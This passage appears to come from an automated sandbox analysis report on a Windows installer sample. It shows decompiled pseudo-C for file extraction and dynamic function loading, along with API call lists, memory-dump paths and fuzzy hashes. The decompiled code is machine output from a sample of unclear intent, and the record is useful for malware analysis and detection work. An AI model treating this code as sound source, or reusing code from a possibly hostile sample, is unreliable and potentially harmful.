                                                                                                                          						__eflags = _t202 - _t253;
                                                                                                                          						goto L143;
                                                                                                                          					}
                                                                                                                          					_t205 = _t198 - 1;
                                                                                                                          					if(_t205 == 0) {
                                                                                                                          						_t167 = _t291 + 0x408; // 0x408
                                                                                                                          						_t206 = _t167;
                                                                                                                          						__eflags =  *_t206;
                                                                                                                          						if( *_t206 == 0) {
                                                                                                                          							goto L145;
                                                                                                                          						}
                                                                                                                          						_t207 = E10001641(_t206);
                                                                                                                          						L136:
                                                                                                                          						 *(_t291 + 0x80c) = _t207;
                                                                                                                          						goto L145;
                                                                                                                          					}
                                                                                                                          					if(_t205 != 1) {
                                                                                                                          						goto L145;
                                                                                                                          					}
                                                                                                                          					_t72 = _t291 + 8; // 0x8
                                                                                                                          					_t255 = _t72;
                                                                                                                          					_t288 = E10001641(_t72);
                                                                                                                          					 *(_t291 + 0x808) = _t288;
                                                                                                                          					if(_t288 == 0) {
                                                                                                                          						goto L144;
                                                                                                                          					}
                                                                                                                          					 *(_t291 + 0x850) =  *(_t291 + 0x850) & 0x00000000;
                                                                                                                          					 *((intOrPtr*)(_t291 + 0x84c)) = E10001550(_t255);
                                                                                                                          					 *(_t291 + 0x83c) =  *(_t291 + 0x83c) & 0x00000000;
                                                                                                                          					 *((intOrPtr*)(_t291 + 0x848)) = 1;
                                                                                                                          					 *((intOrPtr*)(_t291 + 0x838)) = 1;
                                                                                                                          					_t81 = _t291 + 0x408; // 0x408
                                                                                                                          					_t207 =  *(_t288->i + E10001641(_t81) * 4);
                                                                                                                          					goto L136;
                                                                                                                          				}
                                                                                                                          			}





























































                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e96
                                                                                                                          0x10001e98
                                                                                                                          0x10001ea6
                                                                                                                          0x10001ea9
                                                                                                                          0x10001eab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb7
                                                                                                                          0x10001eb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ebb
                                                                                                                          0x10001ebd
                                                                                                                          0x10001ebf
                                                                                                                          0x10001ec1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ec1
                                                                                                                          0x10001ec3
                                                                                                                          0x10001ec5
                                                                                                                          0x10001ec7
                                                                                                                          0x10001ec7
                                                                                                                          0x10001ecd
                                                                                                                          0x10001ed3
                                                                                                                          0x10001ed5
                                                                                                                          0x10001eeb
                                                                                                                          0x10001ed7
                                                                                                                          0x10001edd
                                                                                                                          0x10001ee0
                                                                                                                          0x10001ee0
                                                                                                                          0x00000000
                                                                                                                          0x10001e63
                                                                                                                          0x10001e63
                                                                                                                          0x10001e63
                                                                                                                          0x10001e64
                                                                                                                          0x10001e70
                                                                                                                          0x10001e74
                                                                                                                          0x10001e7a
                                                                                                                          0x10001e7e
                                                                                                                          0x10001f64
                                                                                                                          0x10001f67
                                                                                                                          0x10001f6a
                                                                                                                          0x10001f6a
                                                                                                                          0x10001f71
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f71
                                                                                                                          0x10001e66
                                                                                                                          0x10001e66
                                                                                                                          0x10001e67
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e69
                                                                                                                          0x10001e6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e6a
                                                                                                                          0x10001e61
                                                                                                                          0x10001dfb
                                                                                                                          0x10001e04
                                                                                                                          0x10001e07
                                                                                                                          0x10001e14
                                                                                                                          0x10001e14
                                                                                                                          0x10001e09
                                                                                                                          0x10001e09
                                                                                                                          0x00000000
                                                                                                                          0x10001dfb
                                                                                                                          0x10001d98
                                                                                                                          0x10001d9b
                                                                                                                          0x10001de7
                                                                                                                          0x10001dea
                                                                                                                          0x00000000
                                                                                                                          0x10001dea
                                                                                                                          0x10001d9d
                                                                                                                          0x10001da0
                                                                                                                          0x10001dcb
                                                                                                                          0x10001dce
                                                                                                                          0x10001dd5
                                                                                                                          0x10001ddc
                                                                                                                          0x10001ddf
                                                                                                                          0x10001de2
                                                                                                                          0x00000000
                                                                                                                          0x10001de2
                                                                                                                          0x10001da2
                                                                                                                          0x10001da3
                                                                                                                          0x10001dba
                                                                                                                          0x10001dc1
                                                                                                                          0x10001dc4
                                                                                                                          0x00000000
                                                                                                                          0x10001dc4
                                                                                                                          0x10001da8
                                                                                                                          0x10001ef6
                                                                                                                          0x10001ef6
                                                                                                                          0x10001ef8
                                                                                                                          0x10002225
                                                                                                                          0x10002228
                                                                                                                          0x10002289
                                                                                                                          0x10001f62
                                                                                                                          0x10001f62
                                                                                                                          0x10001f62
                                                                                                                          0x00000000
                                                                                                                          0x10001f62
                                                                                                                          0x1000222a
                                                                                                                          0x1000222d
                                                                                                                          0x10002239
                                                                                                                          0x1000223c
                                                                                                                          0x1000223d
                                                                                                                          0x10002240
                                                                                                                          0x10002247
                                                                                                                          0x1000224a
                                                                                                                          0x1000224b
                                                                                                                          0x1000224e
                                                                                                                          0x10002295
                                                                                                                          0x10002298
                                                                                                                          0x1000229b
                                                                                                                          0x00000000
                                                                                                                          0x1000229b
                                                                                                                          0x10002250
                                                                                                                          0x10002253
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002255
                                                                                                                          0x1000225c
                                                                                                                          0x1000225c
                                                                                                                          0x10002262
                                                                                                                          0x10002265
                                                                                                                          0x10002281
                                                                                                                          0x10002267
                                                                                                                          0x10002270
                                                                                                                          0x10002273
                                                                                                                          0x10002273
                                                                                                                          0x00000000
                                                                                                                          0x10002265
                                                                                                                          0x10002242
                                                                                                                          0x00000000
                                                                                                                          0x10002242
                                                                                                                          0x1000222f
                                                                                                                          0x10002232
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002234
                                                                                                                          0x10002237
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002237
                                                                                                                          0x10001efe
                                                                                                                          0x10001efe
                                                                                                                          0x10001eff
                                                                                                                          0x10002026
                                                                                                                          0x10002026
                                                                                                                          0x1000202b
                                                                                                                          0x1000202e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000203b
                                                                                                                          0x00000000
                                                                                                                          0x100021cd
                                                                                                                          0x100021d0
                                                                                                                          0x100021d3
                                                                                                                          0x100021d3
                                                                                                                          0x100021d4
                                                                                                                          0x100021d7
                                                                                                                          0x100021d9
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021dd
                                                                                                                          0x100021dd
                                                                                                                          0x100021e0
                                                                                                                          0x100021f2
                                                                                                                          0x100021f5
                                                                                                                          0x100021fe
                                                                                                                          0x00000000
                                                                                                                          0x100021fe
                                                                                                                          0x100021e2
                                                                                                                          0x100021e2
                                                                                                                          0x100021e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021e6
                                                                                                                          0x100021e8
                                                                                                                          0x100021ea
                                                                                                                          0x100021ea
                                                                                                                          0x100021ea
                                                                                                                          0x100021eb
                                                                                                                          0x100021ed
                                                                                                                          0x100021ef
                                                                                                                          0x100021d3
                                                                                                                          0x100021d4
                                                                                                                          0x100021d7
                                                                                                                          0x100021d9
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x10002082
                                                                                                                          0x1000232f
                                                                                                                          0x10002331
                                                                                                                          0x10002331
                                                                                                                          0x10002337
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x100022eb
                                                                                                                          0x100022f1
                                                                                                                          0x100022f3
                                                                                                                          0x100022f9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022f9
                                                                                                                          0x100022c8
                                                                                                                          0x100022cf
                                                                                                                          0x100022d5
                                                                                                                          0x00000000
                                                                                                                          0x100022d5
                                                                                                                          0x10001fa9
                                                                                                                          0x10001faa
                                                                                                                          0x100022a2
                                                                                                                          0x100022a2
                                                                                                                          0x100022a8
                                                                                                                          0x100022ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022b2
                                                                                                                          0x100022b7
                                                                                                                          0x100022b8
                                                                                                                          0x00000000
                                                                                                                          0x100022b8
                                                                                                                          0x10001fb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fc0
                                                                                                                          0x10001fc5
                                                                                                                          0x10001fcb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fd1
                                                                                                                          0x10001fde
                                                                                                                          0x10001fe4
                                                                                                                          0x10001fee
                                                                                                                          0x10001ff4
                                                                                                                          0x10001ffc
                                                                                                                          0x1000200c
                                                                                                                          0x00000000
                                                                                                                          0x1000200c

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001541: GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001E28
                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001E74
                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001E7E
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001E98
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000212C
                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10002273
                                                                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 100022DA
                                                                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 100022EB
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000230E
                                                                                                                          • lstrcatA.KERNEL32(00000408,10004024), ref: 10002320
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000232D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$AddressAllocProc$HandleLibraryLoadModulelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2432367840-0
                                                                                                                          • Opcode ID: ee092e71ca505709d651e0729bf6a215d1fa5f7789b41da9f2bb1e621745af8d
                                                                                                                          • Instruction ID: 43630dbe77052cbd99e7b50fc19318fc31bc1fc88c17e7e17ecc67392abc93a9
                                                                                                                          • Opcode Fuzzy Hash: ee092e71ca505709d651e0729bf6a215d1fa5f7789b41da9f2bb1e621745af8d
                                                                                                                          • Instruction Fuzzy Hash: 94029C71D0464ADFEB60CFA4C8807EEBBF4FB043C4F21852AE5A5A7189D7749A81DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t43;
                                                                                                                          				FILETIME* _t49;
                                                                                                                          				FILETIME* _t62;
                                                                                                                          				void* _t64;
                                                                                                                          				signed int _t70;
                                                                                                                          				FILETIME* _t71;
                                                                                                                          				FILETIME* _t75;
                                                                                                                          				signed int _t77;
                                                                                                                          				void* _t80;
                                                                                                                          				CHAR* _t82;
                                                                                                                          				void* _t85;
                                                                                                                          
                                                                                                                          				_t75 = __ebx;
                                                                                                                          				_t82 = E004029F6(0x31);
                                                                                                                          				 *(_t85 - 8) = _t82;
                                                                                                                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                                                                          				_t33 = E0040553D(_t82);
                                                                                                                          				_push(_t82);
                                                                                                                          				if(_t33 == 0) {
                                                                                                                          					lstrcatA(E004054D0(E004059DD(0x409b50, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                                                                          				} else {
                                                                                                                          					_push(0x409b50);
                                                                                                                          					E004059DD();
                                                                                                                          				}
                                                                                                                          				E00405C3F(0x409b50);
                                                                                                                          				while(1) {
                                                                                                                          					__eflags =  *(_t85 + 8) - 3;
                                                                                                                          					if( *(_t85 + 8) >= 3) {
                                                                                                                          						_t64 = E00405CD8(0x409b50);
                                                                                                                          						_t77 = 0;
                                                                                                                          						__eflags = _t64 - _t75;
                                                                                                                          						if(_t64 != _t75) {
                                                                                                                          							_t71 = _t64 + 0x14;
                                                                                                                          							__eflags = _t71;
                                                                                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                                                                          						}
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                          						__eflags = _t70;
                                                                                                                          						 *(_t85 + 8) = _t70;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                          					if( *(_t85 + 8) == _t75) {
                                                                                                                          						E00405695(0x409b50);
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - 1;
                                                                                                                          					_t41 = E004056B4(0x409b50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                          					__eflags = _t41 - 0xffffffff;
                                                                                                                          					 *(_t85 - 0x34) = _t41;
                                                                                                                          					if(_t41 != 0xffffffff) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                          					if( *(_t85 + 8) != _t75) {
                                                                                                                          						E00404D7B(0xffffffe2,  *(_t85 - 8));
                                                                                                                          						__eflags =  *(_t85 + 8) - 2;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                          						}
                                                                                                                          						L31:
                                                                                                                          						 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                          						__eflags =  *0x423f08;
                                                                                                                          						goto L32;
                                                                                                                          					} else {
                                                                                                                          						E004059DD(0x40a350, 0x424000);
                                                                                                                          						E004059DD(0x424000, 0x409b50);
                                                                                                                          						E004059FF(_t75, 0x40a350, 0x409b50, "C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                                                                                          						E004059DD(0x424000, 0x40a350);
                                                                                                                          						_t62 = E0040529E("C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                                                                                          						__eflags = _t62;
                                                                                                                          						if(_t62 == 0) {
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t62 == 1;
                                                                                                                          							if(_t62 == 1) {
                                                                                                                          								 *0x423f08 =  &( *0x423f08->dwLowDateTime);
                                                                                                                          								L32:
                                                                                                                          								_t49 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          							} else {
                                                                                                                          								_push(0x409b50);
                                                                                                                          								_push(0xfffffffa);
                                                                                                                          								E00404D7B();
                                                                                                                          								L29:
                                                                                                                          								_t49 = 0x7fffffff;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L33:
                                                                                                                          					return _t49;
                                                                                                                          				}
                                                                                                                          				E00404D7B(0xffffffea,  *(_t85 - 8));
                                                                                                                          				 *0x423f34 =  *0x423f34 + 1;
                                                                                                                          				_push(_t75);
                                                                                                                          				_push(_t75);
                                                                                                                          				_push( *(_t85 - 0x34));
                                                                                                                          				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                                                                                                          				_t43 = E00402E5B(); // executed
                                                                                                                          				 *0x423f34 =  *0x423f34 - 1;
                                                                                                                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                                                                          				_t80 = _t43;
                                                                                                                          				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                                                                          					L22:
                                                                                                                          					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                                                                          				} else {
                                                                                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                                                                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                                                                                          				__eflags = _t80 - _t75;
                                                                                                                          				if(_t80 >= _t75) {
                                                                                                                          					goto L31;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t80 - 0xfffffffe;
                                                                                                                          					if(_t80 != 0xfffffffe) {
                                                                                                                          						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffee);
                                                                                                                          					} else {
                                                                                                                          						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffe9);
                                                                                                                          						lstrcatA(0x409b50,  *(_t85 - 8));
                                                                                                                          					}
                                                                                                                          					_push(0x200010);
                                                                                                                          					_push(0x409b50);
                                                                                                                          					E0040529E();
                                                                                                                          					goto L29;
                                                                                                                          				}
                                                                                                                          				goto L33;
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                            • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,sail Setup,NSIS Error), ref: 004059EA
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                            • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                            • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse728B.tmp$C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll$Call
                                                                                                                          • API String ID: 1941528284-2845556833
                                                                                                                          • Opcode ID: c66380c8fa0b887d4e17fb9e13828c0b6bba1636114cd380fdc525b4a1122b51
                                                                                                                          • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                                                                                                          • Opcode Fuzzy Hash: c66380c8fa0b887d4e17fb9e13828c0b6bba1636114cd380fdc525b4a1122b51
                                                                                                                          • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                                                          				signed int _v8;
                                                                                                                          				long _v12;
                                                                                                                          				long _v16;
                                                                                                                          				long _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char _v88;
                                                                                                                          				void* _t62;
                                                                                                                          				void* _t63;
                                                                                                                          				int _t66;
                                                                                                                          				intOrPtr _t74;
                                                                                                                          				long _t75;
                                                                                                                          				int _t78;
                                                                                                                          				void* _t88;
                                                                                                                          				intOrPtr _t91;
                                                                                                                          				void* _t93;
                                                                                                                          				long _t96;
                                                                                                                          				signed int _t97;
                                                                                                                          				long _t98;
                                                                                                                          				int _t99;
                                                                                                                          				void* _t100;
                                                                                                                          				long _t101;
                                                                                                                          				void* _t102;
                                                                                                                          
                                                                                                                          				_t97 = _a16;
                                                                                                                          				_t93 = _a12;
                                                                                                                          				_v12 = _t97;
                                                                                                                          				if(_t93 == 0) {
                                                                                                                          					_v12 = 0x8000;
                                                                                                                          				}
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				_t88 = _t93;
                                                                                                                          				if(_t93 == 0) {
                                                                                                                          					_t88 = 0x40f020;
                                                                                                                          				}
                                                                                                                          				_t60 = _a4;
                                                                                                                          				if(_a4 >= 0) {
                                                                                                                          					_t91 =  *0x423ed8; // 0x8f76
                                                                                                                          					E00403080(_t91 + _t60);
                                                                                                                          				}
                                                                                                                          				_t62 = E0040304E( &_a16, 4); // executed
                                                                                                                          				if(_t62 == 0) {
                                                                                                                          					L34:
                                                                                                                          					_push(0xfffffffd);
                                                                                                                          					goto L35;
                                                                                                                          				} else {
                                                                                                                          					if((_a19 & 0x00000080) == 0) {
                                                                                                                          						if(_t93 == 0) {
                                                                                                                          							while(_a16 > 0) {
                                                                                                                          								_t98 = _v12;
                                                                                                                          								if(_a16 < _t98) {
                                                                                                                          									_t98 = _a16;
                                                                                                                          								}
                                                                                                                          								if(E0040304E(0x40b020, _t98) == 0) {
                                                                                                                          									goto L34;
                                                                                                                          								} else {
                                                                                                                          									_t66 = WriteFile(_a8, 0x40b020, _t98,  &_a12, 0); // executed
                                                                                                                          									if(_t66 == 0 || _t98 != _a12) {
                                                                                                                          										L29:
                                                                                                                          										_push(0xfffffffe);
                                                                                                                          										L35:
                                                                                                                          										_pop(_t63);
                                                                                                                          										return _t63;
                                                                                                                          									} else {
                                                                                                                          										_v8 = _v8 + _t98;
                                                                                                                          										_a16 = _a16 - _t98;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L45:
                                                                                                                          							return _v8;
                                                                                                                          						}
                                                                                                                          						if(_a16 < _t97) {
                                                                                                                          							_t97 = _a16;
                                                                                                                          						}
                                                                                                                          						if(E0040304E(_t93, _t97) != 0) {
                                                                                                                          							_v8 = _t97;
                                                                                                                          							goto L45;
                                                                                                                          						} else {
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_v16 = GetTickCount();
                                                                                                                          					E00405DD9(0x40af90);
                                                                                                                          					_t13 =  &_a16;
                                                                                                                          					 *_t13 = _a16 & 0x7fffffff;
                                                                                                                          					_a4 = _a16;
                                                                                                                          					if( *_t13 <= 0) {
                                                                                                                          						goto L45;
                                                                                                                          					} else {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					while(1) {
                                                                                                                          						L9:
                                                                                                                          						_t99 = 0x4000;
                                                                                                                          						if(_a16 < 0x4000) {
                                                                                                                          							_t99 = _a16;
                                                                                                                          						}
                                                                                                                          						if(E0040304E(0x40b020, _t99) == 0) {
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_a16 = _a16 - _t99;
                                                                                                                          						 *0x40afa8 = 0x40b020;
                                                                                                                          						 *0x40afac = _t99;
                                                                                                                          						while(1) {
                                                                                                                          							 *0x40afb0 = _t88;
                                                                                                                          							 *0x40afb4 = _v12; // executed
                                                                                                                          							_t74 = E00405DF9(0x40af90); // executed
                                                                                                                          							_v24 = _t74;
                                                                                                                          							if(_t74 < 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t100 =  *0x40afb0; // 0x40f020
                                                                                                                          							_t101 = _t100 - _t88;
                                                                                                                          							_t75 = GetTickCount();
                                                                                                                          							_t96 = _t75;
                                                                                                                          							if(( *0x423f34 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
                                                                                                                          								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                          								_t102 = _t102 + 0xc;
                                                                                                                          								E00404D7B(0,  &_v88);
                                                                                                                          								_v16 = _t96;
                                                                                                                          							}
                                                                                                                          							if(_t101 == 0) {
                                                                                                                          								if(_a16 > 0) {
                                                                                                                          									goto L9;
                                                                                                                          								}
                                                                                                                          								goto L45;
                                                                                                                          							} else {
                                                                                                                          								if(_a12 != 0) {
                                                                                                                          									_v8 = _v8 + _t101;
                                                                                                                          									_v12 = _v12 - _t101;
                                                                                                                          									_t88 =  *0x40afb0; // 0x40f020
                                                                                                                          									L24:
                                                                                                                          									if(_v24 != 1) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									goto L45;
                                                                                                                          								}
                                                                                                                          								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
                                                                                                                          								if(_t78 == 0 || _v20 != _t101) {
                                                                                                                          									goto L29;
                                                                                                                          								} else {
                                                                                                                          									_v8 = _v8 + _t101;
                                                                                                                          									goto L24;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_push(0xfffffffc);
                                                                                                                          						goto L35;
                                                                                                                          					}
                                                                                                                          					goto L34;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                                                          • wsprintfA.USER32 ref: 00402F77
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$FileWritewsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 4209647438-2449383134
                                                                                                                          • Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                                                          • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                                                                                                          • Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                                                          • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                                                          				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                                                          				int _t19;
                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                                                          				signed char _t22;
                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                                                          				CHAR* _t25;
